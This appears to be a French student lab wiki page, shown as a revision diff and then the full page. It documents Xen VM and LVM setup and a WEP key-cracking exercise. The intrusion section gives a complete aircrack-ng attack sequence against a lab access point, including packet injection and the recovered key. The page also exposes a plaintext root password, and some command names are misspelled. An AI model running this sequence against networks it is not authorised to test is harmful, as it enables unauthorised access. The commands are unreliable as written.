TP sysres IMA5sc 2020/2021 G5 : Différence entre versions
(→Tests d'intrusion) |
(→Tests d'intrusion) |
||
Ligne 117 : | Ligne 117 : | ||
Nous utilisons donc la commande : airmong-ng | Nous utilisons donc la commande : airmong-ng | ||
− | Ce qui nous retourne le nom de notre interface, dans notre cas : wlan0mon. | + | Ce qui nous retourne le nom de notre interface, dans notre cas : |
+ | wlan0mon. | ||
− | Nous démarrons cette interface en mode moniteur avec la commande afin d'écouter le trafic wifi aux alentours : airmong-ng start wlan0mon | + | Nous démarrons cette interface en mode moniteur avec la commande afin d'écouter le trafic wifi aux alentours : |
+ | airmong-ng start wlan0mon | ||
− | Par la suite nous affichons l'ensemble des réseaux WiFi WEP capter par notre interface : airodump-ng --encrypt wep wlan0mon | + | Par la suite nous affichons l'ensemble des réseaux WiFi WEP capter par notre interface : |
+ | airodump-ng --encrypt wep wlan0mon | ||
Apparaît alors la cracotte05, nous récupérons son BSSID : 04:DA:D2:9C:50:54 qui va alors nous servir à stocker les vecteurs d'initialisation générées par le point d'accés à l'aide de la commande : | Apparaît alors la cracotte05, nous récupérons son BSSID : 04:DA:D2:9C:50:54 qui va alors nous servir à stocker les vecteurs d'initialisation générées par le point d'accés à l'aide de la commande : | ||
− | airodump-ng --write data --channel 3 -bssid 04:DA:D2:9C:50:54 wlan0mon | + | airodump-ng --write data --channel 3 -bssid 04:DA:D2:9C:50:54 wlan0mon |
Nous pouvons "stimuler" le point d'accés, afin d'augmenter le nombre de paquets transmis (et collectés) : | Nous pouvons "stimuler" le point d'accés, afin d'augmenter le nombre de paquets transmis (et collectés) : | ||
Ligne 131 : | Ligne 134 : | ||
'''Injection''' : aireplay-ng -3 -e cracotte05 -b 04:DA:D2:9C:50:54 -h 40:A5:EF:01:35:79 wlan0mon | '''Injection''' : aireplay-ng -3 -e cracotte05 -b 04:DA:D2:9C:50:54 -h 40:A5:EF:01:35:79 wlan0mon | ||
− | Après avoir capturer assez de paquet (environ 30 000) il est possible de cracker la clé WEP à l'aide de la commande : aircrack-ng -z data.cap | + | Après avoir capturer assez de paquet (environ 30 000) il est possible de cracker la clé WEP à l'aide de la commande : |
+ | aircrack-ng -z data.cap | ||
On obtient alors : KEY FOUND! [F1:DE:D4:00:00:00:00:00:00:00:0F:FF:FF ] | On obtient alors : KEY FOUND! [F1:DE:D4:00:00:00:00:00:00:00:0F:FF:FF ] |
Version du 2 novembre 2020 à 15:02
Groupe | Domaine | Distribution | VLAN privé | IP (VLAN333) | Netmask (VLAN333) | Gateway (VLAN333) | Gateway 6509-E (VLAN333) | Gateway 9200 (VLAN333) | IP (publique) |
---|---|---|---|---|---|---|---|---|---|
Groupe 5 | amanite.site | Debian 10 Buster | 305 | 100.64.0.24 | 255.255.255.0 | 100.64.0.254 | 100.64.0.1 | 100.64.0.2 | 193.48.57.184 |
Sommaire
Création d'une machine virtuelle Xen Linux sur le dom0 capbreton.plil.info
Connexion ssh :
ssh pifou@capbreton.plil.info
Création de la VM Xen :
> su - (Afin de pouvoir accéder aux variables d'environnement de su et ainsi accéder à sbin/mkswap)
> xen-create-image --hostname=amanite --ip=100.64.0.19 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=pasglop --dir=/usr/local/xen --dist=buster
Résultat de la commande :
General Information -------------------- Hostname : amanite Distribution : buster Mirror : http://deb.debian.org/debian Partitions : swap 512M (swap) / 4G (ext4) Image type : sparse Memory size : 256M Kernel path : /boot/vmlinuz-4.19.0-9-amd64 Initrd path : /boot/initrd.img-4.19.0-9-amd64
Networking Information ---------------------- IP Address 1 : 100.64.0.19 [MAC: 00:16:3E:C4:6A:BB] Netmask : 255.255.255.0 Gateway : 100.64.0.5
Configuration des LV
Après que Guillaume ait créer un volume group sur capbreton pour chaque groupe puis attribuer 2 Logical Volume (LV) de 10Go sur ce volume group il est nécessaire de formater ces 2 LV à l'aide des commandes suivantes :
root@capbreton:~# mkfs.ext4 /dev/storage/amanite1 root@capbreton:~# mkfs.ext4 /dev/storage/amanite2
Nous avons par la suite modifier le fichier config de la VM, amanite.cfg, afin qu'elle possède les volumes loguqes amanite1 et amanite2 précédemment créé en rajoutant les lignes ci-dessous :
Dans la fonction Disk Device(s) :
disk = [ ... 'phy:/dev/storage/RingotSanchez1,xvdav3,w' 'phy:/dev/storage/RingotSanchez2,xvdav4,w' ]
Puis dans Networking :
vif = [ 'bridge=IMA5sc, ...']
Création et configuration de la machine virtuelle
Lorsque nous sommes connecté en ssh à capbreton, creation de la VM avec la commande : xl create -c /etc/xen/amanite.cfg
- Commandes utiles
- Affichage de l'ensemble des VM présente sur capbreton : xl list
- Se connecter à la VM : xen console amanite
Identifiant de la machine : root Mdp de la machine : pasglop
Suite de la configuration
Pour que les répertoires /var et /home de la machine virtuelle soient sur des partitions LVM de l’hôte il faut tout d'abord formater xvda3, xvda4 en ext 4 à l'aide des commandes :
root@amanite:~# mkfs.ext4 /dev/xvda3 root@amanite:~# mkfs.ext4 /dev/xvda4
Par la suite nous montons nos deux disques afin d'y déplacer nos répertoires (en ayant préalablement créer les points de montages /mnt/xvda3 et /mnt/xvda4) :
root@amanite:~# mount /dev/xvda3 /mnt/xvda3 root@amanite:~# mount /dev/xvda4 /mnt/xvda4
Le répertoire /home étant vide nous ne déplaçons que le répertoire /var dans le disques xvda4 :
root@amanite:~# mv /var/* /mnt/xvda4.
Puis nous démontons (umount) nos deux volumes.
On modifie ensuite /ect/fstab en ajoutant :
/dev/xvda3 /home ext4 defaults 0 2 /dev/xvda4 /var ext4 defaults 0 2
Puis on les monte à l'aide de la commande : mount -a Finalement à l'aide de la commande lsblk nous pouvons verifier notre montage :
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT xvda1 202:1 0 512M 0 disk [SWAP] xvda2 202:2 0 4G 0 disk / xvda3 202:3 0 10G 0 disk /home xvda4 202:4 0 10G 0 disk /var
Tests d'intrusion
Cassage de clef WEP d’un point d’accès WiFi
- Liste des commandes :
- Lister les interfaces WiFi disponibles : airmong-ng
- Passage d'une interface en mode moniteur : airmong-ng start <Interface>
- Affichage et scan des réseaux WiFi WEP environnants : airodump-ng --encrypt wep <Interface>
- Capture des paquets émis par le point d'accés cible : airodump-ng --write <nomFichierSortie> --channel 3 -bssid <@mac_AP> <nomInterface>
- Crack la clef WEP après avoir capture au minimum 30 000 paquets : aircrack-ng -x <nomFichierSortie>-01.cap
Notre première étape consiste à passer notre interface en mode moniteur. Nous utilisons donc la commande : airmong-ng
Ce qui nous retourne le nom de notre interface, dans notre cas :
wlan0mon.
Nous démarrons cette interface en mode moniteur avec la commande afin d'écouter le trafic wifi aux alentours :
airmong-ng start wlan0mon
Par la suite nous affichons l'ensemble des réseaux WiFi WEP capter par notre interface :
airodump-ng --encrypt wep wlan0mon
Apparaît alors la cracotte05, nous récupérons son BSSID : 04:DA:D2:9C:50:54 qui va alors nous servir à stocker les vecteurs d'initialisation générées par le point d'accés à l'aide de la commande :
airodump-ng --write data --channel 3 -bssid 04:DA:D2:9C:50:54 wlan0mon
Nous pouvons "stimuler" le point d'accés, afin d'augmenter le nombre de paquets transmis (et collectés) :
Fake Authentication : aireplay-ng -1 0 -e cracotte05 -a 04:DA:D2:9C:50:54 -h 40:A5:EF:01:35:79 wlan0mon
Injection : aireplay-ng -3 -e cracotte05 -b 04:DA:D2:9C:50:54 -h 40:A5:EF:01:35:79 wlan0mon
Après avoir capturer assez de paquet (environ 30 000) il est possible de cracker la clé WEP à l'aide de la commande :
aircrack-ng -z data.cap
On obtient alors : KEY FOUND! [F1:DE:D4:00:00:00:00:00:00:00:0F:FF:FF ] Decrypted correctly: 100%